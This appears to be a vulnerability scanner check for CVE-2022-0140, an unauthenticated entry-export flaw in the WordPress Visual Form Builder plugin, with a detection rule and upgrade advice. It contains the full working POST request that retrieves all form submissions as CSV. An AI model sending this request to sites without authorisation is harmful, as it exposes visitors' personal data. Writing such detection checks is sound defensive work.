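metadata:
    language: v1-beta
    name: "CVE-2022-0140"
    description: "CVE-2022-0140 - WordPress Visual Form Builder < 3.0.6 - Unauthenticated Information Disclosure. Sends an unauthenticated POST to the vfb-export admin page and reports if a CSV of form entries (header row containing \"Date Submitted\" and \"Entries ID\") is returned. Only probes /wp-admin at the site root; WordPress installs under a sub-directory are not covered."
    author: "Celia S"
    tags: "CVE-2022-0140","WordPress"

define:
    potential_path = "/wp-admin/admin.php?page=vfb-export"

given host then
    send request called check:
        `POST {potential_path} HTTP/1.1
Host: {base.request.url.host}
Referer: {base.request.url.host}{potential_path}
Content-Type: application/x-www-form-urlencoded
Origin: {base.request.url.host}
Content-Length: 116

vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File`

    if {check.response.status_code} is "200"
    and {check.response.body} matches "\"Date Submitted\""
    and {check.response.body} matches "\"Entries ID\"" then
        report issue:
            severity: info
            confidence: certain
            detail: `CVE-2022-0140 found at {potential_path}. The plugin does not perform access control on the entry export action, so an unauthenticated user can retrieve all submissions for a form as a CSV file via the vfb-export endpoint. Exported entries may contain personal data submitted by site visitors; review the response body to assess the exposure.`
            remediation: "Upgrade Visual Form Builder to version 3.0.6 or later, which adds an access-control check to the export action. See https://www.fortiguard.com/zeroday/FG-VD-21-082 for details."
    end if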